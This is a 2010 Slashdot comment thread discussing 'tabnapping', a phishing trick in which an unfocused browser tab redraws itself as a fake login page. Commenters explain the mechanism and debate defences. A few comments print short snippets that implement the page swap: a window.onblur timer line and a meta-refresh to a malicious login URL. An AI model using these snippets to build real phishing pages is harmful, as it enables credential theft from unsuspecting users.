  Solution: never go to any important web site when you have other bullshit websites open. Kill the browser, wait the 10-30 seconds for it to really die, and open a new one. Then go directly to the site you want, preferably by typing in the URL (in case they figure out a way to change your bookmarks).
  Better yet, use a different account, which you only use for banking and/or a small number of other important sites; in Linux, Win7, and XP it's easy to create a user account for that single purpose.
  Better yet, use a separate, old/cheap computer running a recent Ubuntu and Firefox, and don't ever use that machine for anything else (this is really the only way to guard against keyloggers and similar).
  Better yet, rip the hard drive out of the old computer, password-protect the BIOS, and boot from a CD (Knoppix or something), so there's no NV storage for a virus. Always cold boot before you pay your bills. I wonder if there's a way to physically write-protect an SSD - is there a jumper? 16 GB SSD's are cheap and can boot Linux in seconds.
  It depends on your comfort level, and what you're protecting. Going to websites where money is at stake while you have 30 other tabs open in the browser is asking for trouble (and using a different window doesn't help, it's all the same program underneath). Doing it from a Windows computer which you also use for random surfing is questionable, given the prevalence of key loggers similar nonsense. And no, doing it from Linux running in a VirtualBox on your infested rootkitted windows machine doesn't help, all the keystrokes and screen images pass through the loggers and scrapers running on the host OS, you lose.
  None of the above approaches really work for protecting your email account, or other things you use while you're also doing other work; you're not going to use a separate machine exclusively for email or chatting. But if your comms are that sensitive, you ought to be working on a clean machine anyway - get a separate machine for junk surfing, stay on safe sites on the work box, and be careful what "helpful" utilities you download and install. If you must day-trade 24/7 with money that matters, same thing - the only really safe solution is a separate, clean computer. The only way a computer stays clean is to limit what you do with it (web sites visited, programs installed, SONY music CDs played, etc) to known-safe activities, and make sure you're firewalled (and preferably air gapped and/or turned off when not in use). What makes it tough is that any Youtube video or web site with a Flash ad can probably infect you; to be really safe you probably have to severely limit even normal work-related web based research to a few known good sites. That's hard for any work that requires research.
  But I'm not paranoid ;-)
78. Re:Umm... by del_diablo · 2010-05-26 23:45 · Score: 1
  
  Tab 8 ? Its marked as "read", and would flash if it altered. So yes I would know.
79. Re:Umm... by Anonymous Coward · 2010-05-29 11:21 · Score: 0
  
  would flash if it altered
  What plugin are you using to alert you when the contents change? That could be pretty useful for all these rapidshare sites where you have to wait 10 minutes before the javascript reveals the download button.
Nab the tab? by Anonymous Coward · 2010-05-25 00:57 · Score: 1, Insightful

This is why it's so important to check the address of the site you're about to log into.
1. Re:Nab the tab? by Anonymous Coward · 2010-05-25 05:38 · Score: 0
  
  This is why it's so important to check the address of the site you're about to log into.
  Even better: type in the address of the site you're about to log into. Especially if it's a bank or something equally important.
We need death squads by commodore64_love · 2010-05-25 01:00 · Score: 1

People who do this crap of stealing people's accounts or identities should be shot.

--
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
1. Re:We need death squads by PhongUK · 2010-05-25 01:02 · Score: 3, Funny
  
  How do we identify them?
2. Re:We need death squads by commodore64_love · 2010-05-25 01:03 · Score: 1
  
  On second thought, since government does sometimes convict innocent people, let's avoid the death penalty. Let's make these creeps lifelong indentured servant to whomever they have harmed. I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart serve as my maid for a summer.
  
  --
  "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
3. Re:We need death squads by Chrisq · 2010-05-25 01:12 · Score: 1
  
  People who do this crap of stealing people's accounts or identities should be shot.
  How do we identify them?
  Why not ask the RIAA. They identify lots of copyright infringers. What could possibly go wrong.
4. Re:We need death squads by Anonymous Coward · 2010-05-25 01:13 · Score: 0
  
  You watched that Seinfeld episode again, didn't you?
5. Re:We need death squads by Anonymous Coward · 2010-05-25 01:22 · Score: 0
  
  I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart
  Hahahaha. Couldn't have happened to a more deserving person. Maybe Alex Jones will go ask the reptilians to loan you the money?
6. Re:We need death squads by AndrewBC · 2010-05-25 01:44 · Score: 2, Funny
  
  New plan: steal my own identity sloppily under the guise of your identity which I stole perfectly. Now polish my boots!
7. Re:We need death squads by WrongSizeGlass · 2010-05-25 01:49 · Score: 1
  
  New plan: steal my own identity sloppily under the guise of your identity which I stole perfectly. Now polish my boots!
  Now, that is just evil. Go to your room and think about what you've ... um, on the other hand, stop thinking about that stuff before you come up with an even more devilish plan.
8. Re:We need death squads by Anonymous Coward · 2010-05-25 02:46 · Score: 0
  
  I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart serve as my maid for a summer.
  You dirty pervert!
9. Re:We need death squads by vlueboy · 2010-05-25 03:20 · Score: 1
  
  On second thought [...] Let's make these creeps lifelong indentured servant to whomever they have harmed. I wouldn't mind having the guy who stole my credit card and purchased $4000 at Walmart serve as my maid for a summer.
  I surely would enjoy having fat geeks around my house calling me "Master!"... just because they're wearing this.
  PS: Please call me if you find slender female scammers! There's all these animes I've been watching...
10. Re:We need death squads by Anonymous Coward · 2010-05-25 05:20 · Score: 0
  
  So they can steal the rest of your stuff???
Sneaky... by fuzzyfuzzyfungus · 2010-05-25 01:01 · Score: 3, Interesting

Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common(if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.

You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.
1. Re:Sneaky... by jamesh · 2010-05-25 01:47 · Score: 1
  
  Obviously, this won't subvert SSL certs or anything
  Are there any browser addons that alert you when you are entering a password into a non-SSL site? That would reduce this problem unless the bad guys got SSL certs or compromised websites with SSL certs, which is less common. And even then, the addon could flash something down the bottom like "entering password for yourbank.com" vs "entering password for yourbank.com.badguy.ru". You'd have to be observant but less actively so.
2. Re:Sneaky... by ArsenneLupin · 2010-05-25 02:54 · Score: 1
  
  Obviously, this won't subvert SSL certs or anything;
  Nor would it need to. This is not an attack on the connection (or routing, or DNS), but on the user's "laziness" to doublecheck the URL if for some reason he believes he entered it himself an hour ago. Of course, the SSL certificate would match the URL... but the URL won't be the URL of the bank.
3. Re:Sneaky... by Hurricane78 · 2010-05-25 04:40 · Score: 1
  
  but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.
  Well, there is a natural process that stops that behavior very quickly. It’s called natural selection. It forces people to either wise up and care, or be weeded out very quickly.
  But as long as we add additional layers of idiot protection bubble wrap, we deliberately hinder this process. And then we whine that people act that way.
  They only act efficient in the situation that is around them. If they don’t need to care and know, why should they? It’s thrown away resources. You are gonna do it for them anyway. Any you nicely respond to the screams of being entitled to it too.
  They are neither dumb nor ignorant. It simply is a comfortable strategy for them.
  It has gotten so bad, that when you treat people normal and fair, instead of doing the above, you are labeled asocial. To add insult to injury, those labeling you this way, are themselves asocial by unfairly treating those “protected people” preferentially with that above assistance.
  The core thing is, that people usually help others, because that indirectly helps everything, including themselves. It’s a model with an incredible success, especially for humans. And it’s good that way.
  But above problem comes from taking this behavior too far. Into regions where it’s hurting us all instead.
  So the best thing to do, is the counter-intuitive behavior, of simply letting them feel the consequences of their behavior a bit. So they can learn to cope with it themselves.
  If you don’t want to be a dick, you do this slowly, so they can keep up. Instead of letting them fall in a hole when you go away.
  Maybe they lose a little money, or get a shock that is big enough to remember this for the next time.
  And you will see, that after a time, natural selection and their (to that point unused) extreme intelligence will solve the thing in no time. :)
  
  --
  Any sufficiently advanced intelligence is indistinguishable from stupidity.
4. Re:Sneaky... by Anonymous Coward · 2010-05-25 05:17 · Score: 0
  
  Then you go to the source of the problem. The ISP hosting these phishing sites. There should be a unified system where these URL's and domains (along with IP and ISP inf) can be tagged. Here's how I think it should work, just off the top of my head:
  1. After a few users report/tag a URL as a phishing attempt, _everyone_ starts getting warned about this specific URL.
  2. After enough reports, this warning escalates to the domain.
  3. And finally, if enough domains hosted by an ISP or IP range are reported, all of them get reported.
  For this to work effectively, you also need participation of domain registrars or whatever. Or the IP leasing people. So that ISP's can't just re-lease new IP ranges or something.
  Also, you need company registration agency's participation to register ISP's. Again, to prevent re-registration of new ISP names etc.
  It has to be a comprehensive solution, otherwise whatever attempt we make will have to be "hit the potato", and watch it pop up somewhere again later.
  I've come across this scenario many times. There are solutions to so many problems out there right now. The reason they are not being fixed is that no one is willing to fix it fully, or spend enough money to fix it fully.
  -XcepticZP
This is one of those stupidly smart things. by Securityemo · 2010-05-25 01:02 · Score: 3, Informative

You see this, and think "Why didn't someone think about this before?"

--
Emotions! In your brain!
1. Re:This is one of those stupidly smart things. by supersloshy · 2010-05-25 01:21 · Score: 2, Interesting
  
  You see this, and think "Why didn't someone think about this before?"
  Tab Mix Plus has had locked tabs for a while now. I'm not entirely sure if this fixes the issue of tabnapping, but it looks like it might.
  
  --
  "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
2. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 01:36 · Score: 1
  
  I'm sure NoSCRIPT will help also. Why does Firefox even allow a script to manipulate tabs other than ones it opened?
3. Re:This is one of those stupidly smart things. by WrongSizeGlass · 2010-05-25 01:46 · Score: 1
  
  NoScript will help because this is done via simple javascript. The 'tab' is not manipulated - a new front-most 'div' appears that displays the fake login screen. I'm sure the same type of thing could be accomplished by changing the document.location via a timer rather than displaying a new div.
  
  The tech behind this type of scam is not new by any means ... it's just that the concept is different.
4. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 01:56 · Score: 1
  
  So, if a legitimate page is loaded in a tab, how is a new DIV painted on top of it by an outside source?
  Doesn't that violate the same origin policy, with regards to the scripting?
5. Re:This is one of those stupidly smart things. by WrongSizeGlass · 2010-05-25 01:59 · Score: 1
  
  The page the exploit takes you to is not legitimate, it just looks legit because it loads a copy of the correct site's login page ... then swaps them if you leave the tab.
6. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 02:07 · Score: 1
  
  Not talking about the page something takes you to.
  I'm talking about the page you start on.
  An exploit page loaded later should have no control of what is displayed in the body of a legitimate page in another tab.
7. Re:This is one of those stupidly smart things. by WrongSizeGlass · 2010-05-25 02:24 · Score: 1
  
  The name they use for this is misleading - it has nothing to do with other tabs. It only requires you to leave the malicious page you initially landed on. You don't need to go to a new tab, all you need to do is go to a new tab or page or other application, as long as the malicious page/tab loses focus - it uses the window.onblur() event:
  * You land on a malicious page, usually from a legit looking fake e-mail
  * The malicious page displays HTML copied/scraped/etc from the legit site the e-mail was faking
  * You go to another tab, window or application
  * After 5 seconds (in the demo) the malicious page replaces its content with the 'scam' login for either the original page it displayed or another site (such as Gmail, Facebook, etc)
  * When you return to the malicious "tab" you encounter the scam login.
8. Re:This is one of those stupidly smart things. by ShadowRangerRIT · 2010-05-25 03:35 · Score: 2, Informative
  To be clear, this isn't manipulating another tab. The sequence of events is:
  
  User opens link to seemingly innocuous but malicious site in Tab 1
  
  User goes to Tab 2 to do some other work (tab 2 is immaterial to this; it would work just as well if they switched to another application long enough to forget what they were doing in the browser)
  
  Malicious site in Tab 1 detects that it is unobserved, and replaces itself with a seemingly legitimate log-in page; this need not require a refresh with appropriately designed CSS and JavaScript, so you won't even see any action in the tab bar if you happen to be looking.
  
  User returns to Tab 1, assumes he opened the log-in screen for some reason and enters user name and password
  
  Now, in a two tab scenario, this sequence of events in unlikely. But for a user with 30 tabs open, there is a non-negligible chance that they forget what was on tab 17, and assume they had some reason to log-in to that site. People are really good at justifying actions that make no sense; just because they don't remember opening the site doesn't mean they won't come up with a reason why they would have. If they aren't aware of this exploit and forgot what was on the tab, they'd have little reason to be suspicious.
  Basically, this isn't a Firefox specific exploit. Any tabbed browser that doesn't disable all JavaScript by default will behave this way. NoScript and similar extensions will help, but a clever website designer might design the page to be useless without JavaScript. There are enough websites like that that a sufficiently interested user might whitelist it, if only temporarily, and some small percentage of those users may succumb to the trap.
  --
  $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
9. Re:This is one of those stupidly smart things. by Anonymous Coward · 2010-05-25 03:43 · Score: 0
  
  Doubtful. This attack just refreshes the information already in the page, which that info page specifically says it can do, even on a "frozen" page.
  - Pitabred (ac because I modded)
10. Re:This is one of those stupidly smart things. by Qzukk · 2010-05-25 03:52 · Score: 1
  
  So, if a legitimate page is loaded in a tab, how is a new DIV painted on top of it by an outside source?
  No no no, your legitimate page is loaded in Tab 18. Or was it 32 or 3 or... well, that doesn't matter. What matters is that the Evil Site on Tab 6 now looks like a login page for a site that you've been to before (detected by :visited). And you were logged into gmail on Tab 6, right? Right???
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
11. Re:This is one of those stupidly smart things. by Garble+Snarky · 2010-05-25 03:54 · Score: 2, Informative
  
  The locking prevents the user from navigating to another page. I don't think it has any effect on scripts that were initially loaded with the page.
12. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 06:48 · Score: 1
  
  Hm.. suggested fix.
  Sites with real login pages should change their design, so that when a window with a login page displayed loses focus, the login page disappears, and the user is directed to type the URL of the front page into their address bar again, in order to login.
  This can also be considered a security feature... the user might have typed their username/password in and accidentally left the page that way.
  By forcing the user to go back to the login page URL, they are guaranteed a fresh login form every time, and can't accidentally leave credentials partially typed.
13. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 06:49 · Score: 1
  
  If I was logged into it, why on earth would it be prompting me to login again ?
  It wouldn't.... the display of a new login prompt is inherently suspicious.
14. Re:This is one of those stupidly smart things. by ShadowRangerRIT · 2010-05-25 08:36 · Score: 1
  A couple problems:
  
  We'd need to train users to expect that behavior or we'd derive no benefit from it
  
  It makes for a really shitty user experience. For a banking website people would understand, but for Gmail? Half the people I know keep Gmail open in a tab all the time and switch back and forth; this would drive them batty.
  
  As I noted, this would still require user education (so they recognize that good UI means scammer, which is a really fscked up association), so as long as we're relying on that, we may as well just educate them to always recheck the address bar before providing login details. Same benefit, no needlessly awful user experience, no need to make changes. It won't work either way (if your solution is more educated users, then it's untenable for any product offered to the general public), so we may as well not take away functionality.
  --
  $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
15. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 10:54 · Score: 1
  
  It's no problem... the user is already logged in, so there is no need to ever present them a login prompt again (until some later date when they close their browser).
16. Re:This is one of those stupidly smart things. by Qzukk · 2010-05-25 10:56 · Score: 1
  
  the display of a new login prompt is inherently suspicious
  And you KNOW its a new login prompt because you memorize every single page in every single tab, even those pages where you middle click a link to read later, and if just one of those 30 tabs were out of place, you'd know right away?
  Protip: everyone else isn't you.
  Average Joe wouldn't have bothered to memorize which tab had which page, so if he saw a page that looked like his bank website telling him he's logged out due to inactivity and he needs to log back in, he wouldn't think "wait, I was logged in on tab 8 not tab 23" he'd probably try to log back in.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
17. Re:This is one of those stupidly smart things. by mysidia · 2010-05-25 11:45 · Score: 1
  
  Average Joe wouldn't have bothered to memorize which tab had which page
  Um.. problem: Average Joe doesn't know about tabbed browsing in the first place, let-alone clicking or opening 30 tabs.
18. Re:This is one of those stupidly smart things. by Qzukk · 2010-05-25 17:09 · Score: 1
  
  Um.. problem: Average Joe doesn't know about tabbed browsing in the first place, let-alone clicking or opening 30 tabs.
  That's ok, it works with multiple windows too.
  But I'm fairly certain the average tabbed browser user has better things to do with their time than sit there and memorize the content of every tab in order. Looking through the other posts here, it basically boils down to "I have a system" (ie gmail is ALWAYS the first tab on the left, so a gmail "logged out for inactivity" screen somewhere else is wrong) or "I haven't got a clue what I opened in which tab".
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
19. Re:This is one of those stupidly smart things. by LordSnooty · 2010-05-26 01:36 · Score: 1
  
  Suggested workaround - reload any page that has timed out using your menu bar favicon bookmarks before entering information.
Tabnapping by DarkKnightRadick · 2010-05-25 01:06 · Score: 1

Without having RTFA:
That sounds a lot more complicated as you'd need to hack at least one high traffic website, read the cookies stored by the browser, and then force a meta-refresh only when the user isn't looking.

--
"There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
1. Re:Tabnapping by Anonymous Coward · 2010-05-25 01:32 · Score: 0
  
  Well you should have RTFA.
2. Re:Tabnapping by WrongSizeGlass · 2010-05-25 01:57 · Score: 2, Informative
  
  Changing it when you're not looking is done very easily:
  window.onblur = function(){ ;TIMER = setTimeout(changeItUp, 5000); }
  BTW, this isn't just a FireFox issue, he's only tested it in FireFox. It also works in Safari and IE 7 but didn't take in Chrome 5 (Mac).
3. Re:Tabnapping by Anonymous Coward · 2010-05-25 02:03 · Score: 0
  
  RTFA before commenting.
4. Re:Tabnapping by Endo13 · 2010-05-25 02:58 · Score: 1
  
  It also doesn't appear to be working in Chrome 4 on WinXP.
  
  --
  There is no -1 Disagree mod. Slashdot.org/faq defines mod options. USE IT.
5. Re:Tabnapping by DarkKnightRadick · 2010-05-25 05:41 · Score: 1
  
  probably, but the submission gave me enough info to talk about the subject.
  
  --
  "There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
6. Re:Tabnapping by DarkKnightRadick · 2010-05-25 05:42 · Score: 1
  
  Still, you're going to be targeting a group of people who regularly use tabs.
  Though this sounds as if it would work if anything took the focus from the window and not just the tab. Am I incorrect about this?
  
  --
  "There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
Come On by tralflamadore · 2010-05-25 01:06 · Score: 1

He could have come up with something a little less douchey than "tabnapping". Next thing you know, everyone will be saying, "I've been tabnapped!"
1. Re:Come On by Anonymous Coward · 2010-05-25 01:16 · Score: 0
  
  Boobquake has been tabnapped by a Viral Market! Quick, get out your Web 2.0 strategies!
2. Re:Come On by Rashdot · 2010-05-25 02:38 · Score: 1
  
  Worse if someone creates a fix and calls it 'tabnapkin'.
  
  --
  This is not the sig you're looking for.
disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:08 · Score: 4, Interesting

Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.
But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.

--
You can't handle the truth.
1. Re:disabling scripts on unfocused tabs? by The+MAZZTer · 2010-05-25 01:16 · Score: 1
  
  Except this would break AJAX applications that need to send heartbeats, such as chat applications.
2. Re:disabling scripts on unfocused tabs? by jafiwam · 2010-05-25 01:16 · Score: 1
  
  Maybe, as an option with a white list for sites. I say this, because Slashdot would be completely useless if there weren't options. It takes 90 seconds to load all the crap scripting in FireFox if there is more than 100 or so comments. One of the nice things about using tabs, is one window can contain whatever slow-assed crap I am trying to pull up researching some dumb error or other. Having the tab do nothing while not being viewed would remove 99% of the usefulness of tabs.
3. Re:disabling scripts on unfocused tabs? by tokul · 2010-05-25 01:22 · Score: 1
  
  Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.
  
  AJAX, automatic page reloads, download counters on file sharing sites
4. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:29 · Score: 2, Insightful
  
  white listing is not an impossible concept, or is it?
  
  --
  You can't handle the truth.
5. Re:disabling scripts on unfocused tabs? by jellomizer · 2010-05-25 01:32 · Score: 1
  
  Except for the fact that the Web Browser like it or not, is more then just a web browser it is an interface platform for applications. You can bitch and moan all you want. However the Web Apps are here and they are going to stay for a long time. Every time you try to block a security issue you close an other door for honest development. So the easy fix of saying you can cross script to other tabs or windows sounds like an easy fix... It really isn't.
  
  --
  If something is so important that you feel the need to post it on the internet... It probably isn't that important.
6. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:34 · Score: 1
  
  white-listing of sites would fix that problem.
  
  --
  You can't handle the truth.
7. Re:disabling scripts on unfocused tabs? by Lunix+Nutcase · 2010-05-25 01:34 · Score: 1
  
  But highly inconvenient to many users so they will get mad and disable such a feature thus negating the entire purpose.
8. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:37 · Score: 1
  
  I don't know who is bitching or moaning, but the suggestion is totally reasonable when provided with a white-list, so the sites you want to run scripts on background will be able to if the browser warns the user that there are scripts on the background that await execution and that switching from the tab will stop them.
  Then the proverbial: Cancel/Allow or something to that effect would add this site to a white-list.
  So, no need for your dramatic epithets.
  
  --
  You can't handle the truth.
9. Re:disabling scripts on unfocused tabs? by tepples · 2010-05-25 01:39 · Score: 1
  
  Then how do you play online games or use chat features on social sites?
  They would update in one huge refresh a second after you switch back to them.
10. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:40 · Score: 1
  
  Do you think that a dialog, warning a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-listing the site if the 'allow always' button is pushed is such an outrageous concept?
  Maybe then the users deserve to have their private information stolen.
  This is Internet, it's not your mommy, who will love you no matter what you do (supposedly).
  
  --
  You can't handle the truth.
11. Re:disabling scripts on unfocused tabs? by Anonymous Coward · 2010-05-25 01:40 · Score: 0
  
  but you really need to think about what your suggestions will do before making them.
  "need to think"? Ahahahah! Coming from the idiot who claims Apple doesn't invest in R&D. Nice try fucktard. By the way, you really think the average Joe will have 4 tabs open to play some game and chat on same browser? The person who does that, is probably tech inclined enough to whitelist some sites.
  Keep trolling sopssa, every post you make just sheds more light on your ignorance.
  Idiot.
12. Re:disabling scripts on unfocused tabs? by fuzzyfuzzyfungus · 2010-05-25 01:42 · Score: 1
  
  Technologically, yes. From a human interaction perspective, not really.
  
  Unless you want an audience of only security enthusiasts, having your browser break all sorts of common and legitimate websites by default is a no-go.
  
  If a site is convincing enough to phish somebody, it is probably convincing enough to get them to whitelist it(unless you make whitelisting such a pain in the ass that the bottom 20% of your users can't even figure it out).
  
  If you ship your own whitelist, you face the endless time-and-money-sucking battle of having to enumerate goodness on the internet.
  
  If you try to piggyback on some other mechanism(say, any site with a valid SSL cert gets on the whitelist), you still break legitimate sites that don't use or need SSL and don't break malicious sites that use innocuous URLs and simply depend on the user not checking them carefully(ie. getting a reputable cert authority to give you a cert for "bankofam3rica.com" shouldn't be possible. That is an obvious phishing tool. Getting one for "blandurl.com" should be no problem, and nothing stops you from hosting a picture-perfect copy of the Bank of America login page on a blandurl.com subdomain.)
  
  Whitelisting only really works, behaviorally, in situations where a competent and dedicated decision-making authority exercises control over the user. Unfortunately, being such an authority is either a thankless task, or an all-too-rewarding one(either in terms of censorship potential, rent-extraction potential, or both.)
13. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:45 · Score: 1
  
  those are great, aren't they? You missed another one: a delayed HTTP response, in effect a server 'push' to the browser.
  You use white listing to avoid this problem by detecting if a page is running scripts on the background and presenting the user with the obvious: "run always/never/this time/stay on page" dialog with an explanation of why this is.
  If they decide not to pay attention and click on whatever, well, I actually believe in social Darwinism and in this instance it really is not likely that someone will die if their bank account is emptied (though there is a remote chance of that.)
  
  --
  You can't handle the truth.
14. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:55 · Score: 1
  
  Well, the point was that a site that does not look like it's trying to phish anything changes all of a sudden (possible to do with a script or with a delayed HTTP response, sort of a server push) and this innocuously looking site morphs into a phishing page.
  So if the site was a legitimate one (well, how legitimate is the real Facebook, but still) and then someone hijacked it, then it would be a problem for the user because user would trust Facebook.
  If the site is not something that the user is familiar to, that would be the site to block from running scripts on the background unless it's white-listed upon user switching to another tab or application. So the browser would have to detect whether there is a script running on the background of the site and ask the user to: allow always/never/this time/stay on page, and then whitelist the site if the 'allow always' option is chosen.
  Of-course it's not going to prevent every single type of attack, it's just one more protection that can do pretty well if the user understands what is happening of-course.
  --
  Another possibility is to record what the tab/window looked like before the user left the page and then show the old page and the new one once the user returns. It's more complicated than the other proposal, it also has pitfalls, but there must be some options of dealing with this.
  
  --
  You can't handle the truth.
15. Re:disabling scripts on unfocused tabs? by Lunix+Nutcase · 2010-05-25 01:56 · Score: 2
  
  Do you think that a dialog, warning a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-listing the site if the 'allow always' button is pushed is such an outrageous concept?
  Yes. That would be a huge annoyance to many users similar to all the UAC dialogs in Vista.
16. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 01:58 · Score: 1
  
  It could be an annoyance, I guess an annoyance of having your bank account emptied is not as big then? Just saying.
  Of-course there are other options, like displaying to the user what the page looked like when they left it and what it looks like now, by the time they have returned to it, but again, an annoyance.
  
  --
  You can't handle the truth.
17. Re:disabling scripts on unfocused tabs? by Anonymous Coward · 2010-05-25 01:59 · Score: 0
  
  I was going to answer exactly this same thing. Mod up.
18. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 02:02 · Score: 1
  
  Oh, and by the way, 'thinking about suggestions before making them' - that's outdated.
  There is time to act and there is time to think.
  This here, gentlemen, is not time to think.
  (of-course shamelessly ripped off of the Canadian Bacon)
  
  --
  You can't handle the truth.
19. Re:disabling scripts on unfocused tabs? by John+Hasler · 2010-05-25 02:28 · Score: 1
  
  > ...user would trust Facebook.
  Then it's all over anyway for them, isn't it?
  
  --
  Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
20. Re:disabling scripts on unfocused tabs? by coryking · 2010-05-25 02:32 · Score: 1
  
  Then how do you play online games or use chat features on social sites?
  Do what the big-boys do and require the script to be code signed to run in a background tab?
  I dunno... might be an overkill to what amounts to a theoretical attack vector though.
21. Re:disabling scripts on unfocused tabs? by delinear · 2010-05-25 02:54 · Score: 1
  
  The problem is, users don't understand what is happening, they just know that every single time they switch tabs they get this annoying prompt, for every single website they visit until they tick the "always allow" action - just think for a minute how annoying the entire internet experience would be if that was the situation. Even then, at the cost of spoiling the online experience, you've solved nothing when malicious users can still inject their attacks via adverts on otherwise trusted websites, as has happened recently.
22. Re:disabling scripts on unfocused tabs? by delinear · 2010-05-25 03:01 · Score: 1
  
  Indeed, when I'm researching something I'll often pull up ten or so sites from the first page of my search results and read Slashdot while they're loading in the background. These are sites I likely haven't visited before so they won't be whitelisted, yet often they'll be AJAX heavy as they're usually web design/development oriented. It would be incredibly onerous if I had to individually open each site and wait for it to fully finish loading before opening the next. Not to mention you'd give rise to a whole slew of other issues. Opened a connection to a web service and then tabbed away before your AJAX request completes? Should the web service listen indefinitely until you decide to tab back and finish the request or should every AJAX script on the web that communicates with a web service be rewritten to allow this kind of stop-start approach without breaking/timeout issues?
23. Re:disabling scripts on unfocused tabs? by __aayejd672 · 2010-05-25 03:30 · Score: 1
  
  Pfffff, just use IE6 - no tabs, no worries.
24. Re:disabling scripts on unfocused tabs? by PenguinBob · 2010-05-25 04:02 · Score: 1
  
  That may work for more advanced users, but most new users aren't going to be able to figure it out.
25. Re:disabling scripts on unfocused tabs? by this+great+guy · 2010-05-25 04:14 · Score: 1
  
  Disabling javascript is not sufficient. The malicious site could very well redirect to the malicious page after a long period of time, say 10min, with:
  
  <meta http-equiv="refresh" content="600;url=http://example.com/malicious-gmail-login-page" />
  
  Although it is a little less sophisticated, it would work. Personally I have always been using 2 browsers for other reasons (to defend myself against CSRF vulnerabilities) and it turns out that doing so also protects me from 'tabnapping', even though CSRF and tabnapping are 2 completely different attacks. I described my setup here. This is a good example of defense-in-depth: using a security policy that ends up preventing future attacks that were unknown at the time the policy was implemented :-)
26. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 04:37 · Score: 1
  
  It is not actually true, since most websites do not run javascript on the background, most sites use real time scripts. Those that do that, set timeouts or expect an asynchronous AJAX response for example are in minority.
  
  --
  You can't handle the truth.
27. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 04:40 · Score: 2, Interesting
  
  sure, there is also a possibility of a delayed HTTP response to a request, a so-called server push.
  
  --
  You can't handle the truth.
28. Re:disabling scripts on unfocused tabs? by roman_mir · 2010-05-25 07:56 · Score: 1
  
  they don't really need to figure it out.
  Warn a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-list the site automatically if the 'allow always' button is pushed.
  There is also a possibility of showing the user what the page used to look like before the user left it and what it looks like now. This has pretty much the same problem though, if the user does not understand why the page used to look one way and now looks differently, as in the user decides that "sure, the page changed to this 'sign on' screen, that's fine, let me log into it".
  There is no stopping an ignorant user.
  
  --
  You can't handle the truth.
29. Re:disabling scripts on unfocused tabs? by Anonymous Coward · 2010-05-25 12:01 · Score: 0
  
  Why would something that I'm not watching need to send heartbeats? So what if my chat buddies see me as "Away"? When I'm not watching that tab, I am in fact away.
  I would love it if I could tell Firefox to stop script execution in tabs as soon as they lose focus. Javascript in background tabs is the second largest cause for Firefox becoming slow and crashy. (The largest cause is of course Flash.)
  There may be some cases where sites need to execute Javascript even when not interacting with the user, but for those cases they should use web workers anyway, and web workers should be excluded from the block.
Not exactly. by khasim · 2010-05-25 01:12 · Score: 3, Informative

Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen.
Not exactly. From his page on this "exploit"...

You can try it out on this very website (I've only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.
It's hard to find, isn't it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.
So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
1. Re:Not exactly. by jandrese · 2010-05-25 01:29 · Score: 2, Insightful
  
  The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.
  
  Even before tabbed browsing was popular, you could have done this with minimized or backgrounded windows too. To me the big problem is that he has to create a site that people will feel compelled to leave open while they go off and do something else. That will probably be the most difficult part.
  
  --
  
